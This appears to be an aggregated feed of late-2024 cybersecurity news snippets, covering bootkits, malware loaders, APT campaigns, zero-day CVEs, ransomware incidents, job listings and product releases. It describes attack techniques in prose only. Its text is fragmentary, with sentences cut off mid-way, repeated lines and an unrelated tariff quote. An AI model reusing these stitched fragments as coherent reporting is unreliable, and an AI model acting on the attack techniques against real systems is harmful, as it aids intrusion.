Next, it hooks various GRUB functions like "start_image" and "grub_verifiers_open" to manipulate the bootloader"s integrity checks for binaries, including the Linux kernel, turning off signature verification. "Threat actors are using an ingenious new way for covertly delivering malware to a wide variety of operating systems and platforms: they have created a malware loader that uses Godot Engine, an open-source game engine. The loader – dubbed GodLoader – is distributed through the Stargazers Ghost Network, an extensive network of GitHub accounts and repositories that provides malware distribution “as-a-Service”. According to Check Point researchers, over 17,000 machines have been infected with the malicious … More
The post Cybercriminals used a gaming engine to create undetectable malware loader appeared first on Help Net Security.
"Autosummary:
Crafting the malware loader with the Godot Engine Godot Engine is a popular free and open source 2D and 3D game engine / development platform that can both run on many platforms and export projects to Windows, Linux, macOS, Android, iOS, various VR platforms, and more. "Autosummary:
Specifically, the researchers report that, based on Shodan data, 55% of the exposed instances run r1605, released in October 2022, 44% use an unnamed release from April 2023, and only 1% is on r1750, the patched version. "Autosummary:
“Bootkitty is designed to boot the Linux kernel seamlessly, whether UEFI Secure Boot is enabled or not, as it patches, in memory, the necessary functions responsible for integrity verification before GRUB is executed.” continues the report. "Autosummary:
Russian-based cybercrime group RomCom (aka UAT-5647, Storm-0978, Tropical Scorpius, UAC-0180, UNC2596) exploited two Firefox and Tor Browser zero-day vulnerabilities in recent attacks on users across Europe and North America. "Autosummary:
Meanwhile, a spokesman for China"s embassy in Washington, Liu Pengyu, told the BBC that "China-US economic and trade co-operation is mutually beneficial in nature".Doug Ford, the premier of Ontario, Canada"s most populous province, said on Monday the proposed tariff would be "devastating to workers and jobs in both Canada and the US". "Application Security Engineer Agoda | UAE | Hybrid – View job details As an Application Security Engineer, you will develop and design application-level security controls and standards. Perform application security design reviews against new products and services. Track and prioritize all security issues. Build internal security tools that help fix security problems at scale. Perform code review and drive remediation of discovered issues. Enable automated security testing at scale to measure vulnerability, and report on … More
The post Cybersecurity jobs available right now: November 26, 2024 appeared first on Help Net Security.
"Autosummary:
Schubring Global Solutions | USA | On-site – View job details As a Cybersecurity Engineer (RMF/ATO), you will conduct cybersecurity hardening activities (system patching, updating (applications, OSs, firmware, antivirus, etc.), applying Secure Technical Implementation Guides (STIGs) and Security Requirements Guides (SRGs), and any other secure configuration requirements. Industrial Security Officer Helsing | Germany | On-site – View job details As an Industrial Security Officer, you will lead the design, deployment, and operation of advanced security systems, including intruder alerts, CCTV, and access control systems, in compliance with German national and NATO security standards for one of our sites. SOC/SIRT Engineer Datavant | USA | Remote – View job details As a SOC/SIRT Engineer, you will design, mature, and implement advanced playbooks for triage, investigation, and response to cyber threats, with a focus on continuous improvement and automation.Implement and manage standard AWS security tools including but not limited to AWS Security Hub, AWS GuardDuty, Inspector, CloudTrail, WAF, KMS, Config, IAM Access Analyzer. "In this Help Net Security interview, Alona Geckler, Chief of Staff, SVP of Business Operations at Acronis, shares her insights on the diversity environment in the cybersecurity and IT industries. She discusses the progress made over the past two decades, initiatives to foster inclusivity, and the remaining challenges. Geckler addresses unconscious bias and barriers to career advancement, offering practical strategies for organizations to foster more inclusive environments. How has the industry evolved in terms of … More
The post Practical strategies to build an inclusive culture in cybersecurity appeared first on Help Net Security.
"Autosummary:
At Acronis, we’ve embraced this evolution with yearly mentorship programs, Women in Tech (WiT) Chapters across different regions, and initiatives like our WiT Cyberbreakfasts, which we’ve launched in Switzerland, Brazil, Singapore, Serbia, and Israel, with plans to expand into other countries.For instance, our Women in Tech (WiT) programs and panels at industry events, our mentorship programs, and conduction our own research, such as Fear of Missing Out survey, for example, all reflect our commitment to celebrating and increasing diversity.Years ago, structured opportunities for women and minorities were limited sand uncoordinated, but today there are numerous initiatives, including mentorship programs, scholarships, and coding boot camps, that specifically support these groups.Establishing supportive Employee Resource Groups, such as Acronis’ Voices of Employees, as an example, — a working group where representatives from various departments launch initiatives to help employees unite, connect, and build stronger networks — can create a valuable space for dialogue and peer support. "Autosummary:
While investigating this campaign, ESET found that the Russian threat actors focused their attacks on organizations in Ukraine, Europe, and North America from various industries affected, including government, defense, energy, pharmaceuticals, and insurance. "Russia-aligned APT group RomCom was behind attacks that leveraged CVE-2024-9680, a remote code execution flaw in Firefox, and CVE-2024-49039, an elevation of privilege vulnerability in Windows Task Scheduler, as zero-days earlier this year. “Chaining together two zero-day vulnerabilities armed RomCom with an exploit that requires no user interaction,” ESET researchers said. The campaign leveraging the zero-click exploit CVE-2024-9680 allowed the attackers to execute code in the restricted context of the browser and CVE-2024-49039 allowed it … More
The post RomCom hackers chained Firefox and Windows zero-days to deliver backdoor appeared first on Help Net Security.
"Autosummary:
“According to our telemetry, from October 10, 2024 to November 4th, 2024, potential victims who visited websites hosting the exploit were located mainly in Europe and North America,” ESET shared, and noted that the campaign seems to have been widespread. "Autosummary:
Several key factors set MITRE ATT&CK Evaluations apart from other independent analyst assessments, making them particularly valuable for security leaders: Real-World Conditions: Unlike other assessments, MITRE ATT&CK Evaluations are based on simulated TTPs by specific threat actors. "Autosummary:
"Researchers have discovered vulnerabilities in the update process of Palo Alto Networks (CVE-2024-5921) and SonicWall (CVE-2024-29014) corporate VPN clients that could be exploited to remotely execute code on users’ devices. CVE-2024-5921 CVE-2024-5921 affects various versions of Palo Alto’s GlobalProtect App on Windows, macOS and Linux, and stems from insufficient certification validation. It enables attackers to connect the GlobalProtect app to arbitrary servers, the company confirmed, and noted that this may result in attackers installing malicious … More
The post Researchers reveal exploitable flaws in corporate VPN clients appeared first on Help Net Security.
"Autosummary:
“If an immediate upgrade is not feasible, consider using a client firewall to restrict access to known, legitimate VPN endpoints to prevent users from inadvertently connecting to malicious servers,” AmberWolf advised. "Supply chain management SaaS vendor Blue Yonder announced on November 21 that it experienced a ransomware attack that impacted its managed services hosted environment. “Since learning of the incident, the Blue Yonder team has been working diligently together with external cybersecurity firms to make progress in their recovery process. We have implemented several defensive and forensic protocols,” the company said. “With respect to the Blue Yonder Azure public cloud environment, we are actively monitoring and … More
The post Starbucks, grocery stores impacted by Blue Yonder ransomware attack appeared first on Help Net Security.
"Autosummary:
"Commvault announced Clumio Backtrack, a new capability that will enable enterprises to use automation to rapidly revert objects – or pieces of data – stored in Amazon Simple Storage Service (Amazon S3) to a specific version at a specific point and time. This makes it quick and easy for cloud operations, IT, and security teams to recover data from errors, accidents, or cyberattacks, almost as if they were able to turn back the clock to … More
The post Commvault Clumio Backtrack helps recover data from errors, accidents, or cyberattacks appeared first on Help Net Security.
"Autosummary:
“With the increasing complexity of enterprise data environments, businesses need fast, scalable, and secure data recovery solutions for the cloud-first world,” said Woon Jung, CTO – Cloud Native, Commvault. "Autosummary:
Centralized CVE insights: Intel streamlines your research by providing the latest information in one place, including risk scores, known exploits, and more. "Autosummary:
A privilege escalation vulnerability in Windows Task Scheduler (Patched by Microsoft in November 2024) RomCom, also known as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu, has a track record of conducting both cybercrime and espionage operations since at least 2022. "Autosummary:
Victims have been identified across over a dozen countries, including Afghanistan, Brazil, Eswatini, India, Indonesia, Malaysia, Pakistan, the Philippines, South Africa, Taiwan, Thailand, the U.S., and Vietnam. "Autosummary:
Malwarebytes includes the following features: Advanced antivirus, anti-malware, anti-spyware, and more Phishing and malicious link protection Ransomware and zero-day exploit protection Scam protection Brute Force Protection Uninstall Protection Remove not only malware but adware and potentially unwanted programs as well. "Autosummary:
Pierluigi Paganini November 26, 2024 November 26, 2024 Blue Yonder, a supply chain software provider, suffered a ransomware attack, impacting operations for clients like Starbucks and grocery stores. "As we continue to delegate more infrastructure operations to artificial intelligence (AI), quantum computers are advancing towards Q-day (i.e., the day when quantum computers can break current encryption methods). This could compromise the security of digital communications, as well as autonomous control systems that use AI and ML to make decisions. As AI and quantum converge to reveal extraordinary novel technologies, they will also combine to produce new threat vectors and quantum cryptanalysis. AI and … More
The post AI Kuru, cybersecurity and quantum computing appeared first on Help Net Security.
"Autosummary:
AI-diagnosticians have described it as the symptoms of a chronic disease variously characterized as model-collapse, MADness, etc., where AI’s primary source of nutrition was AI-generated junk food, euphemistically known as synthetic data.As we continue to delegate more infrastructure operations to artificial intelligence (AI), quantum computers are advancing towards Q-day (i.e., the day when quantum computers can break current encryption methods). "The Kali SOC in AWS project enables the deployment of a Security Operations Center (SOC) in AWS, utilizing the Kali Linux toolset for purple team activities. This environment is ideal for honing skills in security operations, threat detection, incident response, and training scenarios. About the Kali SOC project “I created this project to address the need for accessible and customizable detection and threat hunting labs. People often ask me for advice on building labs, and … More
The post Deploy a SOC using Kali Linux in AWS appeared first on Help Net Security.
"Autosummary:
Furthermore, the project is designed to give users complete control over their lab, making it adaptable for learning, experimentation, or operational use,” Payton explained. "Wireshark, the popular network protocol analyzer, has reached version 4.4.2. It is used for troubleshooting, analysis, development and education. The following vulnerabilities have been fixed: wnpa-sec-2024-14 FiveCo RAP dissector infinite loop. wnpa-sec-2024-15 ECMP dissector crash. Updated protocol support: ARTNET, ASN.1 PER, BACapp, BT BR/EDR, CQL, DOF, ECMP, ENIP, FiveCo RAP, Frame, FTDI FT, HSRP, HTTP/2, ICMPv6, IEEE 802.11, MBTCP, MMS, MPEG PES, PN-DCP, POP, ProtoBuf, PTP, RPC, RTCP, SIP, SRT, Syslog, TCP, UMTS RLC, USB … More
The post Wireshark 4.4.2: Security updates, bug fixes, updated protocol support appeared first on Help Net Security.
"Autosummary:
Updated protocol support: ARTNET, ASN.1 PER, BACapp, BT BR/EDR, CQL, DOF, ECMP, ENIP, FiveCo RAP, Frame, FTDI FT, HSRP, HTTP/2, ICMPv6, IEEE 802.11, MBTCP, MMS, MPEG PES, PN-DCP, POP, ProtoBuf, PTP, RPC, RTCP, SIP, SRT, Syslog, TCP, UMTS RLC, USB CCID, Wi-SUN, and ZigBee ZCL. OSS-Fuzz 71476: wireshark:fuzzshark_ip_proto-udp: Index-out-of-bounds in DOFObjectID_Create_Unmarshal. "Autosummary:
CVE-2023-46805, CVE-2024-21887 (Ivanti Connect Secure VPN) (Ivanti Connect Secure VPN) CVE-2023-48788 (Fortinet FortiClient EMS) (Fortinet FortiClient EMS) CVE-2022-3236 (Sophos Firewall) (Sophos Firewall) CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 (Microsoft Exchange – ProxyLogon) Salt Typhoon uses LOLbin tools for intelligence gathering and lateral network movement in the post-compromise phase. According to Trend Micro, Salt Typhoon has attacked telecommunications, government entities, technology, consulting, chemicals, and transportation sectors in the U.S., Asia-Pacific, Middle East, South Africa, and other regions. Attribution diagram Source: Trend Micro Salt Typhoon"s global campaigns Salt Typhoon (aka "Earth Estries", "GhostEmperor", or "UNC2286") is a sophisticated hacking group that has been active since at least 2019 and typically focuses on breaching government entities and telecommunications companies. "Autosummary:
According to the Department of Justice, Nicholas Michael Kloster, 31, of Kansas City, Missouri, breached two computer networks, a health club business and a nonprofit organization. "Autosummary:
However, names, dates of birth, email addresses, and countries of residence were breached and it is easy to imagine how a fraudster could exploit such information (for instance, in a phishing campaign) to trick FlipaClip animators into handing over their login credentials and other sensitive information. "Forest Blizzard, a threat group associated with Russia’s GRU military intelligence service, repeatedly breached a US-based organization via compromised computer systems of nearby firms, which they leveraged to authenticate to the target’s enterprise Wi-Fi network. The repeated attacks Volexity, a company that specializes in helping organizations detect the presence of and boot out nation-state level intruders from their systems and networks, said that the attackers were first spotted on a server on the target US … More
The post Faraway Russian hackers breached US organization via Wi-Fi appeared first on Help Net Security.
"Autosummary:
They solved the problem by: Breaching a nearby organization’s system Moving laterally within that organization to find accessible systems that are connected to the network via a wired Ethernet connection and have a Wi-Fi adapter Using that Wi-Fi adapter to connect to the target organization’s Wi-Fi and authenticate to it by using credentials they previous compromised via password spraying. "Autosummary:
Among its 3,000 customers are high-profile organizations like DHL, Renault, Bayer, Morrisons, Nestle, 3M, Tesco, Starbucks, Ace Hardware, Procter & Gamble, Sainsbury, and 7-Eleven. "Autosummary:
️🔥 Trending CVEs Recent cybersecurity developments have highlighted several critical vulnerabilities, including: CVE-2024-44308, CVE-2024-44309 (Apple), CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-11003, CVE-2024-10224 (needrestart), CVE-2024-51092 (LibreNMS), CVE-2024-10217, CVE-2024-10218 (TIBCO), CVE-2024-50306 (Apache Traffic Server), CVE-2024-10524 (wget), CVE-2024-34719 (Android), CVE-2024-9942 (WPGYM), CVE-2024-52034 (mySCADA myPRO), and CVE-2024-0138 (NVIDIA).The attacks primarily target vulnerable IoT devices from various vendors like NETGEAR, Uniview, Reolink, Zyxel, Comtrend, SmartRG, Linear Emerge, Hikvision, and NUUO, using automated scripts in order to deploy the Ngioweb malware.The attacks primarily target vulnerable IoT devices from various vendors like NETGEAR, Uniview, Reolink, Zyxel, Comtrend, SmartRG, Linear Emerge, Hikvision, and NUUO, using automated scripts in order to deploy the Ngioweb malware.The attacks, dubbed RoboPAIR, have been successfully demonstrated against "a self-driving LLM, a wheeled academic robot, and, most concerningly, the Unitree Go2 robot dog, which is actively deployed in war zones and by law enforcement," security researcher Alex Robey said.This development coincides with U.S. telecom providers, including AT&T, Verizon, T-Mobile, and Lumen Technologies, becoming targets of another China-linked hacking group, Salt Typhoon.Ptitsyn, who is alleged to be an administrator, has been charged in a 13-count indictment with wire fraud conspiracy, wire fraud, conspiracy to commit computer fraud and abuse, four counts of causing intentional damage to protected computers, and four counts of extortion in relation to hacking.Ptitsyn, who is alleged to be an administrator, has been charged in a 13-count indictment with wire fraud conspiracy, wire fraud, conspiracy to commit computer fraud and abuse, four counts of causing intentional damage to protected computers, and four counts of extortion in relation to hacking.With features like database and column detection, data length discovery, and multiple extraction methods (character-by-character, binary search, or dictionary attack), BlindBrute ensures efficient data retrieval."The policy update, which compelled users to accept expanded data collection and sharing within the Meta group on a "take-it-or-leave-it" basis, violated user autonomy by offering no opt-out option," the Internet Freedom Foundation (IFF) said."The policy update, which compelled users to accept expanded data collection and sharing within the Meta group on a "take-it-or-leave-it" basis, violated user autonomy by offering no opt-out option," the Internet Freedom Foundation (IFF) said.Millions of Data Records Exposed Due to Power Pages Misconfigurations: Missing or misconfigured access controls in websites built with Microsoft Power Pages are exposing private organizations and government entities" sensitive data to outside parties, including full names, email addresses, phone numbers, and home addresses, leading to potential breaches. "Autosummary:
Some of the other recommendations to mitigate such risks include - Implement a granular role-based access control (RBAC) and follow the principle of least privilege Set up application-level and cloud-level logging for monitoring and analysis Limit the network and data access of the applications and the underlying machines Prevent automatic execution of unreviewed and potentially malicious code in CI/CD pipelines Furthermore, organizations can use IaC scanning tools and solutions like Terrascan and Checkov to preemptively identify misconfigurations and compliance issues prior to deployment. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: 2,000 Palo Alto Networks devices compromised in latest attacks Attackers have compromised around 2,000 Palo Alto Networks firewalls by leveraging the two recently patched zero-days (CVE-2024-0012 and CVE-2024-9474), Shadowserver Foundation’s internet-wide scanning has revealed. Researchers unearth two previously unknown Linux backdoors ESET researchers have identified multiple samples of two previously unknown Linux backdoors: WolfsBane and FireWood. ScubaGear: Open-source tool to … More
The post Week in review: 0-days exploited in Palo Alto Networks firewalls, two unknown Linux backdoors identified appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: November 22, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Aon, Arkose Labs, HiddenLayer, Hornetsecurity, Radware, and Tanium. Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) Apple has released emergency security updates for macOS Sequoia that fix two zero-day vulnerabilities (CVE-2024-44309, CVE-2024-44308) that “may have been actively exploited on Intel-based Mac systems”. "Autosummary:
"Autosummary:
What Meta is doing about it Meta says it employs a range of measures to try to detect and stop these scams on its platforms, including Facebook, Instagram, WhatsApp, and Messenger, before they have the opportunity to bait users and victimize them. "Autosummary:
"Autosummary:
" Redmond has also characterized North Korea"s dispatching of thousands of IT workers abroad as a triple threat that makes money for the regime through "legitimate" work, allows them to abuse their access to get hold of intellectual property, and facilitates data theft in exchange for a ransom. "Autosummary:
China-linked APT Gelsemium uses a new Linux backdoor dubbed WolfsBane Pierluigi Paganini November 23, 2024 November 23, 2024 China-linked APT Gelsemium has been observed using a new Linux backdoor dubbed WolfsBane in attacks targeting East and Southeast Asia.“Consequently, threat actors are exploring new attack avenues, with a growing focus on exploiting vulnerabilities in internet-facing systems, most of which run on Linux.” "Autosummary:
Microsoft seized 240 sites used by the ONNX phishing service Pierluigi Paganini November 23, 2024 November 23, 2024 Microsoft disrupted the ONNX phishing service, seizing 240 sites and naming an Egyptian man as the operator behind the operation. "Autosummary:
"Ransomware gangs recruit pen testers to improve attack reliability Threat actors employ pen testers to improve ransomware effectiveness Threat actors are recruiting pen testers to test and improve the reliability of their ransomware for affiliate programs, according to Cato Networks. Any good developer knows that software needs to be tested before deploying in production environments. This is also true for ransomware gangs. They want to ensure that their ransomware can be deployed successfully against organizations. … More
The post Cybercriminals turn to pen testers to test ransomware efficiency appeared first on Help Net Security.
"Autosummary:
Out of the hundreds of AI applications that Cato CTRL monitors, 10 AI applications were tracked and used by organizations (Bodygram, Craiyon, Otter.ai, Writesonic, Poe, HIX.AI, Fireflies.ai, PeekYou, Character.AI, and Luma AI), revealing various security risks. "Autosummary:
The cybersecurity firm initially observed malicious activities originating from the following IP addresses 136.144.17[.]* 173.239.218[.]251 216.73.162[.]* The advisory pointed out that these IP addresses may be associated with VPN services, for this reason, they are also associated with legitimate user activity. "Autosummary:
" Russia is also believed to have ramped up its sabotage operations across European critical infrastructure following its full-scale invasion of Ukraine in February 2022, targeting Estonia, Finland, Latvia, Lithuania, Norway, and Poland with the goal of destabilizing NATO allies and disrupting their support for Ukraine. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-44308 Apple Multiple Products Code Execution Vulnerability CVE-2024-44309 Apple Multiple Products Cross-Site Scripting (XSS) Vulnerability CVE-2024-21287 Oracle Agile Product Lifecycle Management (PLM) Incorrect Authorization Vulnerability This week, Apple released security updates for two zero-day vulnerabilities, tracked as CVE-2024-44309 and CVE-2024-44308, in iOS, iPadOS, macOS, visionOS, and Safari web browser, which are actively exploited in the wild. "Autosummary:
"Autosummary:
Windows 10 KB5046714 cumulative update preview Source: BleepingComputer After installing this update, Windows 10 22H2 will be updated to build 19045.5198. "Autosummary:
"Autosummary:
Hosts: Graham Cluley: @grahamcluley.com @[email protected] Carole Theriault: @caroletheriault Guest: Maria Varmazis: @varmaz.is @[email protected] Episode links: Sponsored by: 1Password Extended Access Management – Secure every sign-in for every app on every device. "Autosummary:
Source: BleepingComputer These records allegedly contain the following information: Full name Date of birth Gender Home address Phone number Email address Physician Prescriptions Health card history The data was offered for purchase to three users, and currently, no buyers have been declared on the sale listing. "Deep Instinct launched Deep Instinct DSX for Cloud Amazon S3. As organizations increasingly rely on the cloud to power their digital transformation, businesses are generating and storing record amounts of data in the cloud. Cybercriminals know this and are leveraging generative AI to create sophisticated malware that evades existing security tools and takes advantage of the “assume breach” mindset. DSX for Cloud enables businesses to protect sensitive data across cloud storage environments by preventing and … More
The post Deep Instinct delivers malware and ransomware prevention for cloud data stored in S3 buckets appeared first on Help Net Security.
"Autosummary:
"The Computer Emergency Response Team of Ukraine (CERT-UA), part of the State Service of Special Communications and Information Protection (SSSCIP), has joined forces with the simulation training platform Cyber Ranges to unveil TRYZUB, a cyber resilience training and capability development service. TRYZUB primarily protects military, government entities, and critical infrastructure sectors such as energy, healthcare, finance, telecommunications, and education. Its training is designed for military units, law enforcement, government agencies, and operators of essential infrastructure … More
The post Ukrainian cyberwar experience becomes blueprint for TRYZUB cyber training service appeared first on Help Net Security.
"Autosummary:
"Autosummary:
I2Parcae is "notable for having several unique tactics, techniques, and procedures (TTPs), such as Secure Email Gateway (SEG) evasion by proxying emails through legitimate infrastructure, fake CAPTCHAs, abusing hardcoded Windows functionality to hide dropped files, and C2 capabilities over Invisible Internet Project (I2P), a peer-to-peer anonymous network with end-to-end encryption," Cofense researcher Kahng An said. "When infected, I2Parcae is capable of disabling Windows Defender, enumerating Windows Security Accounts Manager (SAM) for accounts/groups, stealing browser cookies, and remote access to infected hosts. "Autosummary:
A crypto scam on BlueSky featuring Meta branding (BleepingComputer) The MetaChain[.]cash website mentioned in the post also appears to carefully impersonate Meta branding, typeface, and messaging: MetaChain domain impersonates Meta branding (BleepingComputer) Another post titled "You"ve won FREE Satoshi Bitcoin of $900k" was seen leading users to a GitHub Pages website, cryptos-satoshi.github[.]io which is no longer accessible. A BlueSky post from last week featured an AI-generated image of Mark Zuckerberg and promoted crypto assets like "MetaChain" and "MetaCoin." As evident from the messaging and graphics, the post misleads viewers into associating the advertised products with tech giant Meta and its concept "Metaverse". "ESET researchers have identified multiple samples of two previously unknown Linux backdoors: WolfsBane and FireWood. The goal of the backdoors and tools discovered is cyberespionage that targets sensitive data such as system information, user credentials, and specific files and directories. These tools are designed to maintain persistent access and execute commands stealthily, enabling prolonged intelligence gathering while evading detection. WolfsBane execution chain (Source: ESET) WolfsBane Researchers discovered the WolfsBane samples at VirusTotal, uploaded from Taiwan, … More
The post Researchers unearth two previously unknown Linux backdoors appeared first on Help Net Security.
"Autosummary:
WolfsBane Researchers discovered the WolfsBane samples at VirusTotal, uploaded from Taiwan, the Philippines, and Singapore, likely originating from an incident response on a compromised server. "Autosummary:
The countries with the most ICS service exposures include the U.S. (more than 48,000), Turkey, South Korea, Italy, Canada, Spain, China, Germany, France, the U.K., Japan, Sweden, Taiwan, Poland, and Lithuania.The majority of exposed HMIs are located in the U.S., followed by Germany, Canada, France, Austria, Italy, the U.K., Australia, Spain, and Poland. "Autosummary:
The attacks, also controlled via Telegram bots, came with built-in two-factor authentication (2FA) bypass mechanisms and most recently targeted financial firms" employees (at banks, credit union service providers, and private funding firms) using QR code phishing (also known as quashing) tactics. "Autosummary:
"Autosummary:
"Autosummary:
WolfsBane"s execution flow Source: ESET Finally, a modified version of the BEURK userland rootkit is loaded via "/etc/ld.so.preload" for system-wide hooking to help hide processes, files, and network traffic related to WolfsBane"s activities. "Autosummary:
"Autosummary:
The advisory has also been updated with the ransomware gang"s new techniques, tactics, and procedures: Targets Windows and ESXi infrastructure, possibly the ProxyShell exploit chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) for initial access. "Autosummary:
Ransomhub ransomware gang claims the hack of Mexican government Legal Affairs Office Pierluigi Paganini November 21, 2024 November 21, 2024 Mexico is investigating a ransomware attack targeting its legal affairs office, as confirmed by the president amidst growing cybersecurity concerns. "Autosummary:
These are the descriptions for the flaws: CVE-2024-48990 (CVSS score: 7.8) – A vulnerability that allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable. "Autosummary:
"Application Security Engineer ENOC | UAE | On-site – View job details As an Application Security Engineer, you will establish and maintain DLP policies to prevent unauthorized access, transmission, or disclosure of sensitive data, focusing on both on-premises and cloud environments. Design, implement, and manage CASB solutions to control and monitor access to cloud applications and safeguard data across cloud services. Application Security Engineer Intellias | Poland | Remote – View job details As an … More
The post Cybersecurity jobs available right now: November 20, 2024 appeared first on Help Net Security.
"Autosummary:
L2 SOC Analyst Neuron Solutions | Malaysia | On-site – View job details As a L2 SOC Analyst, you will analyze security alerts, incidents, and anomalies from a variety of sources (network, endpoint, cloud, etc.), leveraging Azure Sentinel and other security platforms. Information Security Compliance Manager Sidetrade | France | Hybrid – View job details As an Information Security Compliance Manager, you will assist with the development, implementation, and maintenance of information security policies, procedures, and processes in alignment with ISO 27001, SOC 1 and 2, and PCI DSS requirements. Senior Security Engineer – SecOps Robinhood | Canada | On-site – View job details As a Senior Security Engineer – SecOps, you will build and maintain automation workflows to improve the efficiency, speed, and accuracy of our security operations, focusing on reducing manual work and enhancing incident response times. Senior Security Engineer, Software Supply Chain Security Amazon | USA | On-site – View job details As a Senior Security Engineer, Software Supply Chain Security, you will identify security issues and risks, and developing mitigation plans. Cloud Security Lead Pollard Digital Solutions | Canada | Remote – View job details As a Cloud Security Lead, you will lead the development, implementation and management of cloud security policies, procedures and controls to protect our organizations data, systems and assets. "The ransomware attack on UnitedHealth earlier this year is quickly becoming the healthcare industry’s version of Colonial Pipeline, prompting congressional testimony, lawmaker scrutiny and potential legislation. Over the past few months, there have been two congressional hearings on the attack — one in the Senate, followed by one in the House — as well as calls from multiple senators for investigations into how the government responded to the incident, not to mention the criticism against UnitedHealth’s CISO, Steven Martin, … More
The post Five backup lessons learned from the UnitedHealth ransomware attack appeared first on Help Net Security.
"Autosummary:
Auditing should include: Multifactor authentication Immutability best practices CISA #StopRansomware guidelines Dual authorization for critical changes Restricted administrative access Logging best practices Account lockout settings Backup isolation NAS security guidelines Secure snapshots Encryption Adherence to NIST, ISO, NERC CIP, HIPAA and other standards And more… Implementing these strategies and leveraging a security posture management tool ensures that backup systems remain secure, reliable, and resilient against evolving cyber threats. Some ransomware groups – BlackCat, Akira, Lockbit, Phobos, and Crypto, for example – have been bypassing production systems altogether, and going straight for the backups. "Autosummary:
" Some of the custom tools in its arsenal are SIGTRANslator, CordScan, and PingPong, which come with the following capabilities - SIGTRANslator, a Linux ELF binary designed to send and receive data using SIGTRAN protocols CordScan, a network-scanning and packet-capture utility containing built-in logic to fingerprint and retrieve data relating to common telecommunication protocols from infrastructure such as the Serving GPRS Support Node (SGSN) "Autosummary:
"Autosummary:
"Autosummary:
We asked Tammy Stewart, one of Malwarebytes’ researchers, who has made it a hobby to waste the time of phishers herself, and she was enthusiastic about the idea of having a “Daisy.” "Apple has released emergency security updates for macOS Sequoia that fix two zero-day vulnerabilities (CVE-2024-44309, CVE-2024-44308) that “may have been actively exploited on Intel-based Mac systems”. About CVE-2024-44309 and CVE-2024-44308 CVE-2024-44309 affects WebKit, the browser engine used in the Safari web browser and all iOS and iPadOS web browsers, and can be triggered when it’s made to process maliciously crafted web content. It can enable a cross site scripting (XSS) attack. CVE-2024-44308 affects JavaScriptCore – … More
The post Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) appeared first on Help Net Security.
"Autosummary:
"ArmorCode announced the growth of its ASPM Platform with the ability to unify AppSec and infrastructure vulnerability management. The continued innovation of Risk-Based Vulnerability Management (RBVM) in ArmorCode empowers security teams to address vulnerabilities across infrastructure, cloud, and applications with enhanced prioritization, automation, asset and remediation workflows, offering organizations a comprehensive approach to manage risk. ArmorCode delivers an independent governance layer that integrates findings from multiple scanning tools, including infrastructure and application security scanners into … More
The post ArmorCode unifies application security with infrastructure vulnerability management appeared first on Help Net Security.
"Autosummary:
The continued innovation of Risk-Based Vulnerability Management (RBVM) in ArmorCode empowers security teams to address vulnerabilities across infrastructure, cloud, and applications with enhanced prioritization, automation, asset and remediation workflows, offering organizations a comprehensive approach to manage risk. Security teams face several critical challenges, including fragmented visibility across infrastructure and cloud assets, an overwhelming volume of vulnerabilities to address, ownership confusion over asset responsibilities, time-consuming manual processes that slow remediation, and more. "Autosummary:
With NHIDR, organizations can safeguard their assets, maintain compliance, and stay ahead of the threat landscape —because when it comes to protecting critical systems, proactive defense is essential. "Autosummary:
The five flaws are listed below - CVE-2024-48990 (CVSS score: 7.8) - A vulnerability that allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable (CVSS score: 7.8) - A vulnerability that allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable CVE-2024-48991 (CVSS score: 7.8) - A vulnerability that allows local attackers to execute arbitrary code as root by winning a race condition and tricking needrestart into running their own, fake Python interpreter (CVSS score: 7.8) - A vulnerability that allows local attackers to execute arbitrary code as root by winning a race condition and tricking needrestart into running their own, fake Python interpreter CVE-2024-48992 (CVSS score: 7.8) - "Autosummary:
iOS 17.7.2 and iPadOS 17.7.2 – iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later. "Autosummary:
"The new tactic for cash-outs poses a challenge for financial organisations: the ability of cybercriminals to scale the fraudulent offline purchases, making multiple small payments in different places, might not trigger the anti-fraud mechanisms and might allow cybercriminals to successfully buy goods that can be further re-sold (like gift cards)," explains ThreatFabric. "Autosummary:
Here are some examples: “When you open them you will see why I actually wanted to share them with you today” “Never thought I would want to share these images with you, anyways here they are” “I’m presuming you should remember these two ladies, in that photo” “When I was looking through some old folders I found these 3 pics” “it wasn’t initially my plan, but I had to change my mind about it” “Two pictures that I wanted to share with you. If in doubt, contact your friend via another, trusted method If your browser or mobile device “locks up”, meaning you’re no longer able to navigate away from a virus warning, you’re likely looking at a tech support scam. To close the emails off, the scammers end with a quote in the format: “You do not find the happy life. How to avoid the “sad announcement” scam Always compare the actual sender address with the email address this person would normally use to send you an email. "Autosummary:
Apple has released security patches for most of its operating systems, including iOS, Mac, iPadOS, Safari, and visionOS. "Oracle Linux offers a secure, streamlined platform for deploying and managing applications across on-premises, cloud, and edge environments. Designed for demanding workloads, it includes tools for automation, virtualization, high availability, cloud-native development, Kubernetes, and more. Oracle Linux, 9 Update 5 for the 64-bit Intel and AMD (x86_64) and 64-bit Arm (aarch64) platforms is now generally available. This release is packaged with the following kernel options: Unbreakable Enterprise Kernel (UEK) Release 7 Update 3, 5.15.0-302.167.6 for … More
The post Oracle Linux 9 Update 5 brings security updates, OpenJDK 17, .NET 9.0 appeared first on Help Net Security.
"Autosummary:
